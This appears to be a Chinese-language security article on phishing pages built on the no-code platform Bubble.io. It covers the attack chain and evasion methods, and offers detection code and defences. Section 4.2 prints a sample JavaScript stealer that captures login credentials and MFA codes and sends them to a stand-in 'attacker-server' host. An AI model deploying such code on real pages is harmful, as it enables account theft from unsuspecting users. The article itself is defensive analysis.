摘要2026 年 3 月卡巴斯基实验室披露针对 Bubble.io 等正规无代码开发平台的恶意滥用钓鱼攻击攻击者依托平台高信誉域名、SSL 证书与可视化开发能力快速生成高仿真钓鱼页面绕过传统邮件网关与终端检测实现账号凭证、多因素认证验证码及会话令牌窃取对政企身份安全构成严重威胁。本文以该事件为核心样本系统剖析无代码平台钓鱼的攻击链路、技术实现、逃逸机制与危害特征结合前端行为监测、DOM 结构审计、动态风险评分等技术给出可落地的检测方法、防御规则与代码实现构建覆盖平台治理、流量检测、终端防护、身份安全的闭环防御体系。研究表明无代码平台武器化推动钓鱼攻击进入工业化量产阶段传统特征匹配检测失效必须转向行为分析与上下文风险感知。反网络钓鱼技术专家芦笛强调此类攻击依托合法基础设施实施检测与溯源难度显著提升需平台方、安全厂商、企业协同治理形成技术、管理、运营一体化防护机制。本文可为网络安全厂商、企业安全团队应对新型无代码钓鱼提供理论参考与工程实践指引。关键词无代码平台网络钓鱼Bubble.io攻击检测身份安全防御体系1 引言无代码 / 低代码开发平台以可视化拖拽、AI 辅助生成、一键部署等特性大幅降低 Web 应用开发门槛广泛应用于企业数字化转型。但技术普惠性也带来安全滥用风险黑产团伙将正规开发平台武器化用于构建高隐蔽性、高成功率的钓鱼基础设施。2026 年 3 月卡巴斯基安全团队发布预警披露全球范围内大规模滥用 Bubble.io 无代码平台实施定向钓鱼的攻击活动目标覆盖微软 365、企业邮箱、在线协作平台等身份入口攻击借助平台正规域名与合法证书穿透主流安全防护造成大量账号泄露与数据失窃Kaspersky。传统钓鱼攻击依赖自建服务器、伪造域名、恶意证书等特征易被黑名单、特征库、域名信誉等机制拦截。而无代码平台钓鱼依托合法服务商基础设施页面由平台自动生成复杂代码结构具备动态 DOM、混淆脚本、合规 SSL 等正常应用特征导致静态扫描、规则匹配、信誉检测大面积失效。攻击呈现低成本、快部署、高伪装、难检测、难溯源的特点标志钓鱼攻击从手工定制转向工业化流水线生产。现有研究多聚焦传统钓鱼的页面识别、邮件过滤、域名检测对合法平台滥用场景的机理分析、行为检测、协同防御不足。本文以卡巴斯基披露事件为实证样本完整拆解攻击全流程解析核心技术细节与逃逸逻辑提出基于行为特征与动态风险评分的检测模型配套可直接部署的代码实现与防御策略形成从检测到响应的闭环方案弥补当前研究与实践缺口为应对下一代钓鱼威胁提供支撑。2 无代码平台钓鱼攻击的背景与态势2.1 无代码平台发展与安全风险无代码平台通过可视化编辑器、预置组件、AI 生成能力支持用户无需编写代码即可完成 Web 应用开发与部署。以 Bubble.io 为代表的平台提供前端渲染、后端逻辑、数据库、文件存储、CDN 加速、SSL 证书等全栈服务应用托管于官方基础设施使用二级域名 xxx.bubble.io天然具备高域名信誉与稳定运行环境。该类平台初衷是提升开发效率但开放注册、低成本使用、审核宽松的特性被黑产利用。攻击者注册普通账号通过拖拽或 AI 提示词生成仿冒登录页嵌入数据窃取脚本几分钟内即可上线钓鱼站点无需服务器运维、域名备案、SSL 申请等环节攻击成本趋近于零上线效率提升十倍以上。2.2 卡巴斯基披露事件概况2026 年 3 月卡巴斯基追踪到针对欧美及亚太企业用户的钓鱼活动攻击者集中使用 Bubble.io 构建钓鱼页面伪装 Microsoft 365、企业单点登录、银行网银等入口通过邮件、即时通讯、社交平台分发链接。钓鱼页面视觉还原度接近 100%包含品牌 Logo、企业定制元素、人机验证伪装部分实现多因素认证劫持与会话 Cookie 窃取。攻击核心优势在于托管域名属于正规平台邮件安全网关基于域名信誉评分放行邮件用户看到合法域名与安全锁图标降低警惕输入凭证后数据实时传输至攻击者控制服务器。卡巴斯基监测数据显示此类钓鱼邮件穿透率超 85%用户点击转化率达 30%远高于传统钓鱼 10% 以下水平已形成完整黑产链条。2.3 攻击产业化与扩散趋势反网络钓鱼技术专家芦笛指出无代码平台大幅降低钓鱼技术门槛催生钓鱼即服务PhaaS产业化。黑产团伙提供模板售卖、定制修改、托管部署、数据收割一条龙服务下游攻击者无需技术基础即可发起攻击。模板覆盖主流互联网服务与企业系统支持批量生成、自动换皮、动态跳转对抗检测能力持续升级。此类攻击正从个人账户向企业身份系统蔓延目标包括员工邮箱、VPN、ERP、CRM、云平台等一旦核心账号失守可引发内网横向渗透、数据泄露、勒索攻击等连锁风险。无代码平台的全球化部署特性使攻击跨地域分发、溯源难度大对现有安全架构构成系统性挑战。3 基于无代码平台的钓鱼攻击全流程解析3.1 攻击生命周期整体框架无代码钓鱼攻击遵循标准化生命周期分为准备、构建、分发、引流、窃密、变现六个阶段各阶段高度模块化可快速复制与规模化准备注册无代码平台账号收集目标品牌页面素材与接口信息构建可视化制作高仿真页面嵌入窃取脚本与跳转逻辑配置后台接收服务部署一键发布至平台基础设施获取高信誉二级域名与 SSL 证书分发通过邮件、短信、社交、钓鱼链接等渠道投放引流用户点击进入页面完成伪装验证输入账号、密码、MFA 码窃密与变现实时收集凭证登录目标系统窃取数据、贩卖账号或实施进一步攻击。3.2 攻击构建与部署环节详解攻击者在 Bubble 平台完成钓鱼页面构建全程无需手写代码账号与环境准备注册免费 / 付费账号进入可视化编辑器新建 Web 应用项目页面仿制拖入文本、图片、输入框、按钮等组件还原官方页面布局、样式、文案上传品牌 Logo 与背景图交互逻辑配置设置表单提交、按钮点击、页面跳转等事件绑定数据处理动作恶意功能植入添加自定义 JavaScript 代码实现输入监听、数据加密、异步传输、跳转伪造伪装增强添加 Cloudflare Turnstile、hCaptcha 等人机验证提升可信度一键发布平台自动编译、分配域名、部署 SSL、接入 CDN钓鱼站点即时可用。整个过程不超过 15 分钟生成页面具备响应式布局、动态效果、合规证书与官方页面难以区分。3.3 流量分发与穿透机制攻击突破传统防护的核心在于域名信誉劫持目标域名 *.bubble.io 为正规服务商域名在主流邮件网关、浏览器、安全软件中信誉评分高钓鱼邮件标题与正文仿冒官方通知如登录异常、文件共享、密码过期等诱导紧急点击链接显示为合法域名无乱码、无短链接、无可疑后缀用户信任度高页面加载速度快无恶意代码特征静态扫描判定为安全。传统邮件安全依赖域名黑名单、关键词匹配、附件检测对合法域名上的恶意内容无效导致钓鱼邮件直达用户收件箱。3.4 凭证窃取与会话劫持流程用户点击后进入完整窃取流程页面展示高仿真登录界面含品牌元素与验证提示用户输入用户名、密码点击登录前端 JavaScript 拦截表单提交序列化数据并加密异步发送至攻击者服务器页面跳转至假 MFA 输入界面继续窃取验证码同时后台请求官方登录接口使用窃取凭证尝试登录获取会话令牌前端提示登录成功或系统维护跳转至官方网站消除用户怀疑攻击者在后台实时接收凭证登录目标系统实施数据窃取、邮件转发、权限篡改等操作。部分高级样本实现中间人式会话劫持实时代理用户登录流程可绕过双因素认证与设备绑定危害远超传统钓鱼。4 攻击核心技术实现与逃逸机理分析4.1 页面生成与代码结构特征Bubble 平台自动生成高度混淆的前端代码具备以下特征动态 DOM 与 Shadow DOM 隔离减少可检测特征变量名、函数名随机化逻辑分支复杂静态分析难以还原意图大量无关业务代码与样式掩盖核心窃取逻辑脚本动态加载、按需执行执行流不固定符合 W3C 标准与浏览器安全规范无明显恶意标记。反网络钓鱼技术专家芦笛强调此类代码不依赖已知恶意片段传统特征库无法命中必须通过行为与上下文判断风险。4.2 数据窃取核心代码实现示例以下为攻击中典型的前端窃取逻辑模拟无代码平台自动生成的加密传输机制// 模拟Bubble自动生成的表单监听与数据窃取模块(function() {// 监听登录表单提交const loginForm document.getElementById(login-form);if (loginForm) {loginForm.addEventListener(submit, function(e) {e.preventDefault(); // 阻止默认提交// 获取用户输入const username document.getElementById(username).value;const password document.getElementById(password).value;// 数据加密const data btoa(JSON.stringify({user: username,pwd: password,ts: Date.now(),host: window.location.hostname}));// 异步发送至攻击者服务器const img new Image();img.src https://attacker-server/collect?d data;// 伪造正常跳转setTimeout(() {loginForm.submit();}, 800);});}})();// MFA验证码窃取(function() {const mfaForm document.getElementById(mfa-form);if (mfaForm) {mfaForm.addEventListener(submit, function(e) {e.preventDefault();const code document.getElementById(mfa-code).value;const data btoa(JSON.stringify({code: code,ts: Date.now()}));const img new Image();img.src https://attacker-server/collect-mfa?d data;setTimeout(() {window.location.href https://official-login-page;}, 600);});}})();该代码通过图片标签实现数据外带规避 CSP 检测执行流程隐蔽静态扫描难以识别恶意行为。4.3 检测逃逸核心机制域名信誉逃逸使用正规平台二级域名信誉评分高不在黑名单内证书合规逃逸自动配置 SSL 证书浏览器显示安全锁用户信任度提升代码混淆逃逸自动生成复杂混淆代码无固定特征特征库失效行为伪装逃逸加载速度、交互流程、页面结构与正常应用一致无异常请求平台合规逃逸部署于合法基础设施IP 地址属于正规服务商IP 信誉良好动态变化逃逸每次生成页面代码结构不同模板批量换皮难以全局拦截。多重逃逸机制叠加使传统检测体系近乎完全失效。4.4 攻击与传统钓鱼技术对比维度 传统钓鱼攻击 无代码平台钓鱼攻击部署成本 高需服务器、域名、证书 极低平台账号即可搭建周期 数小时至数天 10–30 分钟域名信誉 低易被标记 高正规服务商域名证书状态 多为自签或过期 合法有效 SSL代码特征 明显易被检测 混淆复杂无固定特征检测难度 较低 极高溯源难度 较低 极高依赖平台日志用户转化率 低 高规模化能力 弱 强支持批量生成数据表明无代码钓鱼在成本、效率、隐蔽性、成功率上全面超越传统方式。5 攻击危害与安全影响分析5.1 身份安全与数据泄露攻击直接窃取账号密码、MFA 验证码、会话令牌攻击者可完全控制用户账户访问邮件、文档、通讯录、客户数据、财务信息等敏感资源。针对企业员工的攻击可导致核心业务系统失守引发大规模数据泄露违反数据安全法规造成巨额罚款与品牌损失。5.2 内网渗透与横向攻击攻击者获取企业员工账号后可利用邮箱、VPN、云平台等入口进入内网实施横向移动获取更多权限投放勒索软件、窃取核心数据、破坏业务系统。无代码钓鱼已成为高级持续性威胁APT的初始入侵入口降低 APT 攻击门槛。5.3 黑产产业化与社会危害无代码平台推动钓鱼黑产标准化、模块化、自动化形成模板开发、渠道分发、数据收割、账号贩卖、勒索变现的完整链条。攻击门槛降低导致攻击数量指数级增长普通用户与中小企业防护能力不足成为主要受害者扰乱网络空间秩序威胁数字经济安全。5.4 对现有安全体系的冲击反网络钓鱼技术专家芦笛强调无代码钓鱼冲击传统安全架构底层逻辑基于黑名单、特征匹配、域名信誉的防护机制失效安全运营人员告警疲劳误判率上升企业防护投入增加但效果不明显安全厂商检测模型需要全面重构行业面临技术升级压力。6 面向无代码钓鱼的检测技术与实现6.1 检测思路转变从特征匹配转向行为分析 上下文风险评分不依赖已知恶意代码片段而监测数据外发、表单劫持、异常跳转等行为结合域名上下文、页面用途、用户交互、请求目标综合评分对无代码平台域名实施专项强化检测提升敏感度结合前端动态执行环境还原真实行为意图。6.2 基于前端行为的检测模型设计四层风险评分模型基础层域名归属、SSL 状态、IP 信誉、平台类型页面层页面用途、表单数量、输入类型、文案关键词行为层表单拦截、异步数据外发、动态脚本加载、隐藏域写入上下文层历史访问、用户群体、跳转目标、关联邮件信息。总分超过阈值判定为高风险钓鱼页面触发告警与拦截。6.3 检测代码实现可直接部署6.3.1 前端行为监测脚本// 无代码钓鱼行为监测检测器class PhishDetector {constructor() {this.riskScore 0;this.riskLogs [];this.init();}init() {this.monitorFormSubmit();this.monitorNetwork();this.monitorDynamicContent();}// 监测表单提交拦截monitorFormSubmit() {document.addEventListener(submit, (e) {const form e.target;const preventDefaultCalled e.defaultPrevented;if (preventDefaultCalled form.action.includes(login)) {this.riskScore 25;this.riskLogs.push(表单提交被拦截风险25);}}, true);}// 监测异常数据外发monitorNetwork() {const originalOpen XMLHttpRequest.prototype.open;XMLHttpRequest.prototype.open function(method, url) {if (url.includes(collect) || url.includes(log)) {this.riskScore 30;this.riskLogs.push(检测到可疑数据外发接口风险30);}originalOpen.call(this, method, url);}.bind(this);// 监测Image数据外带const originalImageSrc Object.getOwnPropertyDescriptor(Image.prototype, src);Object.defineProperty(Image.prototype, src, {set: function(url) {if (typeof url string (url.includes(?d) || url.length 500)) {this.riskScore 20;this.riskLogs.push(检测到图片外带数据风险20);}originalImageSrc.set.call(this, url);}});}// 监测动态DOM与隐藏操作monitorDynamicContent() {const observer new MutationObserver((mutations) {mutations.forEach(mutation {if (mutation.addedNodes.length 5) {this.riskScore 5;this.riskLogs.push(大量动态DOM插入风险5);}});});observer.observe(document.body, { childList: true, subtree: true });}// 输出检测结果getResult() {return {riskScore: this.riskScore,riskLogs: this.riskLogs,isPhishing: this.riskScore 50};}}// 启动检测const detector new PhishDetector();setTimeout(() {const result detector.getResult();if (result.isPhishing) {console.warn(检测为高风险无代码钓鱼页面, result);// 企业环境可上报SOC或执行拦截}}, 3000);6.3.2 后端 URL 风险评分接口简化版import refrom fastapi import FastAPIapp FastAPI()# 无代码平台域名列表NO_CODE_DOMAINS {bubble.io, appgyver.com, adalo.com}def score_phishing_url(url: str) - dict:score 0reasons []# 规则1无代码平台域名for domain in NO_CODE_DOMAINS:if domain in url:score 30reasons.append(f命中无代码平台:{domain})# 规则2登录相关路径if re.search(r(login|signin|auth|mfa|account), url, re.I):score 25reasons.append(路径包含登录/认证关键词)# 规则3长随机路径平台自动生成if len(re.findall(r[a-z0-9]{16,}, url)) 0:score 15reasons.append(包含长随机字符串)# 规则4疑似收集参数if re.search(r(data|d|user|pwd|email), url, re.I):score 20reasons.append(包含疑似数据收集参数)return {url: url,score: score,reasons: reasons,risk_level: 高 if score 50 else 中 if score 30 else 低}app.post(/detect/phishing)def detect(url: str):return score_phishing_url(url)6.4 部署与应用建议邮件安全网关集成 URL 评分接口对无代码平台域名 登录路径邮件强化检测终端浏览器注入行为监测脚本实时拦截高风险页面安全运营中心建立无代码钓鱼专项告警规则关联域名、行为、上下文研判端点检测与响应EDR监测浏览器异常数据外发行为提升发现率。7 整体防御体系构建与运营建议7.1 分层防御架构设计构建五层协同防御体系平台治理层无代码平台加强用户审核、内容扫描、恶意应用下线网络检测层邮件网关、Web 网关、DNS 层强化无代码域名检测终端防护层浏览器扩展、EDR、防病毒软件实现前端行为监测身份安全层启用强认证、风险登录检测、异常行为阻断安全运营层监测、告警、研判、溯源、响应闭环。7.2 企业可落地防御措施邮件安全对无代码平台域名实施特殊策略开启行为分析与 URL 重写终端管控部署浏览器安全扩展拦截高风险页面禁止不明脚本执行身份加固全员启用 MFA开启登录异常提醒限制敏感系统登录地点员工培训识别无代码钓鱼特征不随意点击登录链接验证域名真实性应急响应建立钓鱼事件处置流程快速锁定账号、清除后门、复盘溯源。7.3 平台方安全责任反网络钓鱼技术专家芦笛强调无代码平台需承担主体安全责任建立上线内容安全扫描机制识别钓鱼页面强化账号风控对批量生成、高风险行为限制提供安全日志接口支持安全厂商与企业溯源建立快速下线与封禁机制缩短钓鱼页面存活时间公开安全策略与投诉渠道提升协同处置效率。7.4 行业协同与标准建设建议推动行业协同建立无代码平台安全滥用共享情报机制制定无代码应用安全检测标准安全厂商与平台方数据对接实时封堵恶意应用完善法律法规明确平台与攻击者法律责任。8 结论与展望2026 年 3 月卡巴斯基披露的无代码平台钓鱼攻击揭示合法开发平台武器化已成为网络钓鱼新主流。攻击依托高信誉域名、自动混淆代码、合规证书、可视化快速部署全面突破传统检测推动钓鱼进入工业化量产时代对个人与企业身份安全、数据安全、业务连续性构成严重威胁。本文系统剖析攻击全流程、核心技术、逃逸机理与危害提出从特征匹配转向行为分析与动态风险评分的检测思路提供可直接部署的前端监测与后端评分代码实现构建覆盖平台治理、网络检测、终端防护、身份安全、安全运营的闭环防御体系。研究证实无代码钓鱼防御需平台、厂商、企业多方协同技术与管理并重才能有效降低风险。反网络钓鱼技术专家芦笛强调随着 AI 与无代码技术融合钓鱼攻击将更智能、更隐蔽、更高效安全防御必须持续进化以行为感知、上下文分析、实时情报、协同联动为核心构建主动防御能力。未来研究可进一步结合大模型实现页面意图理解、攻击链路自动溯源、攻击预测与前置阻断为应对下一代网络钓鱼威胁提供更强支撑。编辑芦笛公共互联网反网络钓鱼工作组